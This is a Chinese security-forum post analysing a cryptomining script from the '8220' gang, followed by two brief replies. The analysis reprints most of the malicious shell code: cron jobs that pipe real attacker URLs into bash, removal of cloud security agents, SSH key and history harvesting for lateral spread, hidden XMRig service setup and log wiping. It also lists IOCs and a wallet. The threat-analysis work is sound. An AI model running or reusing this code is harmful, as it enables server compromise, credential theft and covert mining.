社区应用 最新帖子 精华区 社区服务 会员列表 统计排行
  • 4669阅读
  • 2回复

[分享]新·8220挖矿团伙样本分析报告

楼层直达
z3960 
级别: 茶馆馆主
发帖
770867
飞翔币
207694
威望
215657
飞扬币
2511641
信誉值
8




前言


在队里看见一个IOC信息http://192.210.200.66:1234/xmss,溯源后发现是8220挖矿团伙的挖矿脚本,于是拿下来进行分析。

溯源


IP信息
参数
IP192.210.200.66
地理位置美国 伊利诺伊州 芝加哥
ASN36352
注册机构ColoCrossing
注册地址Brisbane, Australia, 澳大利亚
开放端口15, 22, 49, 80, 102, 123, 138, 443, 554, 902, 1110, 1177, 1234, 1458, 1515, 1604, 1972, 2067, 2082, 2121, 2727, 3338, 3350, 3371, 3374, 3386, 3397, 4022, 4040, 4592, 4911, 4991, 5353, 5357, 5900, 5901, 5984, 6000, 6001, 7676, 7777, 8009, 8080, 8087, 8090, 8098, 9051, 9160, 9333, 9943, 9981, 9999, 10051, 10250, 49152

反查域名信息: 复制代码 隐藏代码apacheorg.topw.apacheorg.topagent.apacheorg.xyzagent.apacheorg.topapacheorg.xyzw.apacheorg.xyz
涉及恶意文件 复制代码 隐藏代码5d4f2a009db79009b1b86d416019d808ca815ac01df52cd997ae83de9606d3785efc68ad277fe3fc36bfdf7671d8b1ded2f5ec8c97e56f11c5f517aed83ed8b23997fb6cd3b603aad1cd40360be6c20547be2940ef6970954ce71e8ad6d74a74b1582ac0cfbe7cef692d748d1bf4b4b3

挖矿脚本分析


既然先拿到脚本,就先对脚本各个函数梳理一遍。

关闭防火墙


setenforce 0 2>/dev/null 0表示关闭防火墙,2表示以stderr模式输出到/dev/null

优化性能


  1. 设定最大打开文件数:ulimit -n 65535

  2. 禁用防火墙:ufw disable

  3. 允许恶意网络连接传输 复制代码 隐藏代码iptables -P INPUT ACCEPTiptables -P OUTPUT ACCEPTiptables -P FORWARD ACCEPTiptables -F

  4. 修改最大内存页hugepages以提高性能:echo "vm.nr_hugepages=$((1168+$(nproc)))" | tee -a /etc/sysctl.conf

  5. 禁用watchdog:echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf


清除同类挖矿样本

复制代码 隐藏代码netstat -antp | grep ':3333'  | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 %netstat -antp | grep ':4444'  | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 %netstat -antp | grep ':5555'  | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 %netstat -antp | grep ':7777'  | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 %netstat -antp | grep ':14444'  | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 %netstat -antp | grep ':5790'  | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 %netstat -antp | grep ':45700'  | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 %netstat -antp | grep ':2222'  | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 %netstat -antp | grep ':9999'  | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 %netstat -antp | grep ':20580'  | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 %netstat -antp | grep ':13531'  | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 %netstat -antp | grep '23.94.24.12'  | awk '{print $7}' | sed -e 's//.*//g' | xargs -I % kill -9 %netstat -antp | grep '134.122.17.13'  | awk '{print $7}' | sed -e 's//.*//g' | xargs -I % kill -9 %netstat -antp | grep '66.70.218.40'  | awk '{print $7}' | sed -e 's//.*//g' | xargs -I % kill -9 %netstat -antp | grep '209.141.35.17'  | awk '{print $7}' | sed -e 's//.*//g' | xargs -I % kill -9 %echo "123"netstat -antp | grep '119.28.4.91'  | awk '{print $7}' | sed -e 's//.*//g' | xargs -I % kill -9 %netstat -antp | grep '101.32.73.178'  | awk '{print $7}' | sed -e 's//.*//g' | xargs -I % kill -9 %netstat -antp | grep 185.238.250.137 | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %netstat -antp | grep tmate | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %netstat -antp | grep kinsing | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %netstat -antp | grep kdevtmpfsi | awk '{print $7}' | awk  -F '[/]' '{print $1}' | xargs -I % kill -9 %netstat -antp | grep pythonww | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %netstat -antp | grep tcpp | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %netstat -antp | grep c3pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %netstat -antp | grep xmr | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %netstat -antp | grep f2pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %netstat -antp | grep crypto-pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %netstat -antp | grep t00ls | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %netstat -antp | grep vihansoft | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %netstat -antp | grep mrbpool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %ps -fe | grep '/tmp' | grep -v '.rsyslogds'|grep -v '.libs'|grep -v grep  | awk '{print $2}' | sed -e 's//.*//g' | xargs -I % kill -9 %ps aux | grep -a -E "kdevtmpfsi|rot|kinsing|solr|f2pool|tcpp|xmr|tmate|185.238.250.137|c3pool" | awk '{print $2}' | xargs kill -9

设定Google公共DNS

复制代码 隐藏代码if [ $(cat /etc/resolv.conf | grep 8.8.8.8|grep -v grep|wc -l) -eq '0' ];then  echo 'nameserver 8.8.8.8' >> /etc/resolv.confelse  echo "ok"fi

卸载安全服务



卸载阿里云盾和监控服务,屏蔽阿里云盾IP

复制代码 隐藏代码if ps aux | grep -i '[a]liyun'; then    /etc/init.d/aegis uninstall    (wget -q -O - http://update.aegis.aliyun.com/download/uninstall.sh||curl -s http://update.aegis.aliyun.com/download/uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh    (wget -q -O - http://update.aegis.aliyun.com/download/quartz_uninstall.sh||curl -s http://update.aegis.aliyun.com/download/quartz_uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/quartz_uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh    sudo pkill aliyun-service    killall -9 aliyun-service    sudo pkill AliYunDun    killall -9 AliYunDun    iptables -I INPUT -s 100.100.30.1/28 -j DROP    iptables -I INPUT -s 140.205.201.0/28 -j DROP    iptables -I INPUT -s 140.205.201.16/29 -j DROP    iptables -I INPUT -s 140.205.201.32/28 -j DROP    iptables -I INPUT -s 140.205.225.192/29 -j DROP    iptables -I INPUT -s 140.205.225.200/30 -j DROP    iptables -I INPUT -s 140.205.225.184/29 -j DROP    iptables -I INPUT -s 140.205.225.183/32 -j DROP    iptables -I INPUT -s 140.205.225.206/32 -j DROP    iptables -I INPUT -s 140.205.225.205/32 -j DROP    iptables -I INPUT -s 140.205.225.195/32 -j DROP    iptables -I INPUT -s 140.205.225.204/32 -j DROP    rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service    rm -rf /usr/local/aegis*    systemctl stop aliyun.service    systemctl disable aliyun.service    service bcm-agent stop    yum remove bcm-agent -y    apt-get remove bcm-agent -y    /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh stop    /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh remove    rm -rf /usr/local/cloudmonitor

卸载腾讯云镜

复制代码 隐藏代码  elif ps aux | grep -i '[y]unjing'; then    process=(sap100 secu-tcs-agent sgagent64 barad_agent agent agentPlugInD pvdriver )    for i in ${process[@]}    do      for A in $(ps aux | grep $i | grep -v grep | awk '{print $2}')      do        kill -9 $A      done    done    chkconfig --level 35 postfix off    service postfix stop    /usr/local/qcloud/stargate/admin/stop.sh    /usr/local/qcloud/stargate/admin/uninstall.sh    /usr/local/qcloud/YunJing/uninst.sh    /usr/local/qcloud/monitor/barad/admin/stop.sh    /usr/local/qcloud/monitor/barad/admin/uninstall.sh    rm -rf /usr/local/sa    rm -rf /usr/local/agenttools    rm -rf /usr/local/qcloud    rm -f /etc/cron.d/sgagenttask

设定下载命令

复制代码 隐藏代码if ! [ -z "$(command -v wdl)" ] ; then DLB="wdl -O " ; fi ; if ! [ -z "$(command -v wge)" ] ; then DLB="wge -O " ; fiif ! [ -z "$(command -v wget2)" ] ; then DLB="wget2 -O " ; fi ; if ! [ -z "$(command -v wget)" ] ; then DLB="wget -O " ; fiif ! [ -z "$(command -v cdl)" ] ; then DLB="cdl -Lk -o " ; fi ; if ! [ -z "$(command -v cur)" ] ; then DLB="cur -Lk -o " ; fiif ! [ -z "$(command -v curl2)" ] ; then DLB="curl2 -Lk -o " ; fi ; if ! [ -z "$(command -v curl)" ] ; then DLB="curl -Lk -o " ; fiecho $DLB

定时脚本下载/更新,并执行

复制代码 隐藏代码cronlow(){  cr=$(crontab -l | grep -q $url | wc -l)  # 检测crontab中是否有恶意脚本的下载/更新任务  if [ ${cr} -eq 0 ];then    crontab -r    (crontab -l 2>/dev/null; echo "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh")| crontab -  else    echo "cronlow skip"  fi}
将定时任务写入以下位置 复制代码 隐藏代码/etc/cron.d/`whoami`/etc/cron.d/apache/var/spool/cron/`whoami`/var/spool/cron/crontabs/`whoami`/etc/cron.hourly/oanacroner1 复制代码 隐藏代码cron(){  if cat /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 | grep -q "205.185.113.151|5.196.247.12|bash.givemexyz.xyz|194.156.99.30|cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xOTQuMTU2Ljk5LjMwL2QucHkiKS5yZWFkKCkpJw==|bash.givemexyz.in|205.185.116.78"  then    chattr -i -a /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1    crontab -r  fi  if cat /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 | grep "$url"  then    echo "Cron exists"  else    apt-get install -y cron    yum install -y vixie-cron crontabs    service crond start    chkconfig --level 35 crond on    echo "Cron not found"    echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -shn##" > /etc/cron.d/`whoami`    echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -shn##" > /etc/cron.d/apache    echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -shn##" > /etc/cron.d/nginx    echo -e "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -shn##" > /var/spool/cron/`whoami`    mkdir -p /var/spool/cron/crontabs    echo -e "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -shn##" > /var/spool/cron/crontabs/`whoami`    mkdir -p /etc/cron.hourly    echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/cron.hourly/oanacroner1    echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/init.d/down    chattr +ai -V /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 /etc/init.d/down  fi  chattr -i -a /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1  echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/init.d/down | chmod 755 /etc/init.d/down}

搜集用户信息进行传播


搜集用户ssh端口,用户列表,主机列表,登录凭证信息,并尝试进行登录,然后下载下载执行xmss挖矿脚本 复制代码 隐藏代码localgo() {  echo "localgo start"  myhostip=$(curl -sL icanhazip.com)  KEYS=$(find ~/ /root /home -maxdepth 3 -name 'id_rsa*' | grep -vw pub)  KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')  KEYS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | awk -F ' -i ' '{print $2}' | awk '{print $1'})  KEYS4=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)  HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')  HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}.){3}[0-9]{1,3}")  HOSTS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $2}' | awk -F '{print $1}')  HOSTS4=$(cat /etc/hosts | grep -vw "0.0.0.0" | grep -vw "127.0.1.1" | grep -vw "127.0.0.1" | grep -vw $myhostip | sed -r '/n/!s/[0-9.]+/n&n/;/^([0-9]{1,3}.){3}[0-9]{1,3}n/P;D' | awk '{print $1}')  HOSTS5=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}.){3}[0-9]{1,3}" | uniq)  HOSTS6=$(ps auxw | grep -oP "([0-9]{1,3}.){3}[0-9]{1,3}" | grep ":22" | uniq)  USERZ=$(    echo "root"    find ~/ /root /home -maxdepth 2 -name '.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -wv ".ssh"  )  USERZ2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $1}' | awk '{print $4}' | uniq)  sshports=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '-p' '{print $2}' | awk '{print $1}' | sed 's/[^0-9]*//g' | tr ' ' 'n' | nl | sort -u -k2 | sort -n | cut -f2- | sed -e "$a22")  userlist=$(echo "$USERZ $USERZ2" | tr ' ' 'n' | nl | sort -u -k2 | sort -n | cut -f2- | grep -vw "." | grep -vw "ssh" | sed '/./d')  hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6" | grep -vw 127.0.0.1 | tr ' ' 'n' | nl | sort -u -k2 | sort -n | cut -f2-)  keylist=$(echo "$KEYS $KEYS2 $KEYS3 $KEYS4" | tr ' ' 'n' | nl | sort -u -k2 | sort -n | cut -f2-)  i=0  for user in $userlist; do    for host in $hostlist; do      for key in $keylist; do        for sshp in $sshports; do          ((i++))          if [ "${i}" -eq "20" ]; then            sleep 5            ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null &            i=0          fi          #Wait 5 seconds after every 20 attempts and clean up hanging processes          chmod +r $key          chmod 400 $key          echo "$user@$host"          ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$ipurl/xmss||wget -q -O - http://$ipurl/xmss)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$ipurl/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"          ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$ipurl/xmss||wget -q -O - http://$ipurl/xmss)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$ipurl/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"        done      done    done  done  # scangogo  echo "local done"}

安装挖矿服务

复制代码 隐藏代码setupxmrservice(){  echo " Removing previous c3pool miner (if any)"  if sudo -n true 2>/dev/null; then    sudo systemctl stop c3pool_miner.service  fi  killall -9 xmrig  echo " Removing $HOME/c3pool directory"  rm -rf $HOME/c3pool  mv /tmp/.rsyslogds.sh /usr/sbin/.rsyslogds.sh  if [ $(netstat -antp|grep 'rsyslogds'|grep 'ESTABLISHED'|grep -v grep|wc -l) -eq '0' ];then    $DLB /usr/sbin/.rsyslogds $ipurl/.rsyslogds;chmod +x /usr/sbin/.rsyslogds    # preparing script    echo " Creating $HOME/c3pool/miner.sh script"    mv /tmp/.rsyslogds.sh /usr/sbin/.rsyslogds.sh    chmod +x /usr/sbin/.rsyslogds.sh    /bin/bash /usr/sbin/.rsyslogds.sh >/dev/null 2>&1    # preparing script background work and work under reboot    if ! grep .rsyslogds.sh $HOME/.profile >/dev/null; then      echo " Adding $HOME/c3pool/miner.sh script to $HOME/.profile"      echo "/usr/sbin/.rsyslogds.sh >/dev/null 2>&1" >>$HOME/.profile    else      echo "Looks like $HOME/c3pool/miner.sh script is already in the $HOME/.profile"    fi    if ! grep rsyslogds.sh /etc/rc.d/rc.local >/dev/null; then      echo " Adding $HOME/c3pool/miner.sh script to /etc/rc.d/rc.local"      echo "/usr/sbin/.rsyslogds.sh >/dev/null 2>&1" >>/etc/rc.d/rc.local    else      echo "Looks like $HOME/c3pool/miner.sh script is already in the $HOME/.profile"    fi    if [[ $(grep MemTotal /proc/meminfo | awk '{print $2}') > 3500000 ]]; then      echo " Enabling huge pages"      echo "vm.nr_hugepages=$((1168+$(nproc)))" | sudo tee -a /etc/sysctl.conf      sudo sysctl -w vm.nr_hugepages=$((1168+$(nproc)))    fi    if ! type systemctl >/dev/null; then      echo " Running miner in the background (see logs in $HOME/c3pool/xmrig.log file)"      /bin/bash /usr/sbin/.rsyslogds.sh >/dev/null 2>&1      echo "ERROR: This script requires "systemctl" systemd utility to work correctly."      echo "Please move to a more modern Linux distribution or setup miner activation after reboot yourself if possible."    else      echo " Creating c3pool_miner systemd service"      sudo mv /tmp/rsyslogds.service /etc/systemd/system/rsyslogds.service      echo " Starting c3pool_miner systemd service"      sudo killall xmrig 2>/dev/null      sudo systemctl daemon-reload      sudo systemctl enable rsyslogds.service      sudo systemctl start rsyslogds.service      echo "To see miner service logs run "sudo journalctl -u c3pool_miner -f" command"    fi  fi}
这里安装了挖矿程序e5c3720e14a5ea7f678e0a9835d28283

恶意脚本整体流程分析

复制代码 隐藏代码# 杀掉阿里云云盾、腾讯云镜derif [ -w /usr/sbin ]; then    SPATH=/usr/sbin  else  SPATH=/tmpfiecho $SPATH# 创建.rsyslogds.sh文件,最后启动挖矿服务用到cat >/tmp/.rsyslogds.sh <<EOL#!/bin/bash# 文件v中是MD5嘛,用以校验.rsyslogds文件的MD5值x_md51 = `curl http://agent.apacheorg.xyz:1234/v`x_md52 = `md5sum /usr/sbin/.rsyslogds| awk '{print $1}'`# 校验MD5if [ "$x_md52" = "$x_md51" ]; then  # 如果.rsyslogds在进程中没有启动,则启动.rsyslogds  if ! pidof .rsyslogds >/dev/null; then    /usr/sbin/.rsyslogds  fielse  # 如果MD5不相同,则从远端下载.rsyslogds程序,并杀掉非真.rsyslogds,运行真.rsyslogds  $DLB /usr/sbin/.rsyslogds $ipurl/.rsyslogds;chmod +x /usr/sbin/.rsyslogds  pkill .rsyslogds  /usr/sbin/.rsyslogdsfiEOL# 创建rsyslogds守护进程cat >/tmp/rsyslogds.service <<EOL[Unit]Description=rsyslogdservice[Service]ExecStart=/usr/sbin/.rsyslogdsRestart=alwaysNice=10CPUWeight=1[Install]WantedBy=multi-user.targetEOLMD5_1_XMR="e5c3720e14a5ea7f678e0a9835d28283"MD5_2_XMR=`md5sum $SPATH/.rsyslogds | awk '{print $1}'`# 这里看有没有这个路径,没有路径表明肯定没有.rsyslogds文件if [ "$SPATH" = "/usr/sbin" ]then  # 同样这,本地校验.rsyslogds, 的MD5值这里应该写错了,应该是不等于  if [ "$MD5_1_XMR" = "$MD5_2_XMR" ]  then    # .rsyslogds文件MD5相同,下载并运行.rsyslogds    $DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;$SPATH/.rsyslogds    # 启动挖矿服务    setupxmrservice    # 搜集ssh端口、用户列表、主机列表、凭证列表进行登录,传播挖矿脚本    localgo    # 设定脚本下载/更新的定时任务    cron  else    # 运行挖矿程序    $SPATH/.rsyslogds    # 启动服务    setupxmrservice    # 搜集ssh端口、用户列表、主机列表、凭证列表进行登录,传播挖矿脚本    localgo    # 设定脚本下载/更新的定时任务    cron  fielse  # 下载并运行恶意程序.rsyslogds  $DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;$SPATH/.rsyslogds  # 设置脚本执行的定时任务  cronlowfi# 脚本会检查.inis文件是否存在,不存在就从远端下载后拖到后台运行if [ $(ps aux|grep inis|grep -v grep|wc -l) -eq '0' ];then  $DLB $SPATH/.inis $ipurl/.inis;chmod +x $SPATH/.inis  cd $SPATH  nohup ./.inis &else  echo "ok"fihistory -cderecho 0>/root/.ssh/authorized_keysecho 0>/var/spool/mail/rootecho 0>/var/log/wtmpecho 0>/var/log/secureecho 0>/var/log/cronrotecho 0>~/.bash_history

.inis文件

复制代码 隐藏代码#!/bin/bashif ! [ -z "$(command -v wdl)" ] ; then DLB="wdl -O " ; fi ; if ! [ -z "$(command -v wge)" ] ; then DLB="wge -O " ; fiif ! [ -z "$(command -v wget2)" ] ; then DLB="wget2 -O " ; fi ; if ! [ -z "$(command -v wget)" ] ; then DLB="wget -O " ; fiif ! [ -z "$(command -v cdl)" ] ; then DLB="cdl -Lk -o " ; fi ; if ! [ -z "$(command -v cur)" ] ; then DLB="cur -Lk -o " ; fiif ! [ -z "$(command -v curl2)" ] ; then DLB="curl2 -Lk -o " ; fi ; if ! [ -z "$(command -v curl)" ] ; then DLB="curl -Lk -o " ; fiecho $DLBif [ -w /usr/sbin ]; then  SPATH=/usr/sbinelse  SPATH=/tmpfikill(){  ps aux | grep -v '.rsyslogds' |grep -v '.libs'| grep -v grep | awk '{if($3>50.0) print $2}' | while read procid  do    kill -9 $procid  done}while true; do  ipurl="http://agent.apacheorg.top:1234"  MD5_1_XMR = `curl -fsSL $ipurl/v||wget -q -O - $ipurl/v`  MD5_2_XMR=`md5sum $SPATH/.rsyslogds | awk '{print $1}'`  # 这里我怀疑也是写错了,应该是不等于  if [ "$MD5_1_XMR" = "$MD5_2_XMR" ]; then    if [ $(ps -aux|grep '.rsyslogds'|grep -v grep|wc -l) -eq '0' ];then      $SPATH/.rsyslogds    else      echo "ok"    fi  else    $DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;$SPATH/.rsyslogds    chattr +ai $SPATH/.rsyslogds  fi  kill  sleep 1mdone

挖矿程序分析:.rsyslogds



基本信息

参数
文件名.rsyslogds
MD5e5c3720e14a5ea7f678e0a9835d28283
SHA25686843e8a0b7079ab20e0f258600ef597b04ffc35d8a706d250e4122bd1cc4692
文件类型ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), statically linked, stripped
文件大小2077172 bytes
其他信息upx


程序分析


upx脱壳后,打开发现
!
这就是用的现成的XMRig挖矿项目编译,版本为6.7.1,编译日期为2021/01/12

提取到钱包地址:48BBjhM6wjtVPPteiAAyy4FfQogMVvJdSWqbT3T8L9cGb9NhUPRtMHkYVmzLgpYEiuh9B6J1yrXhPdjtnmf7rfQyA73rWaF

IOC信息

复制代码 隐藏代码MD5e5c3720e14a5ea7f678e0a9835d2828351cf7dde4003aa6901918e373bf91b1801972190a83b183b56064d82045de8d6caa9ea2c522fc6268c7e976142d48775IP205.185.113.151194.156.99.305.196.247.12205.185.116.78192.210.200.66domainbash.givemexyz.xyzbash.givemexyz.inagent.apacheorg.topURLhttp://192.210.200.66:1234/xmsshttp://192.210.200.66:1234/vhttp://192.210.200.66:1234/.rsyslogdshttp://192.210.200.66:1234/.inishttp://205.185.113.59:1234/xmsshttp://205.185.113.59:1234/vhttp://205.185.113.59:1234/.rsyslogdshttp://205.185.113.59:1234/.inishttp://agent.apacheorg.top:1234/vhttp://agent.apacheorg.top:1234/xmsshttp://agent.apacheorg.top:1234/.rsyslogdshttp://agent.apacheorg.top:1234/.inis钱包地址
关键词: bot 下载 更新 360 安全
我不喜欢说话却每天说最多的话,我不喜欢笑却总笑个不停,身边的每个人都说我的生活好快乐,于是我也就认为自己真的快乐。可是为什么我会在一大群朋友中突然地就沉默,为什么在人群中看到个相似的背影就难过,看见秋天树木疯狂地掉叶子我就忘记了说话,看见天色渐晚路上暖黄色的灯火就忘记了自己原来的方向。
级别: 超级版主
发帖
830685
飞翔币
224558
威望
224618
飞扬币
2423840
信誉值
0

只看该作者 1 发表于: 2021-11-16
来看一下
级别: 超级版主
发帖
830685
飞翔币
224558
威望
224618
飞扬币
2423840
信誉值
0

只看该作者 2 发表于: 2021-11-16
不错,了解了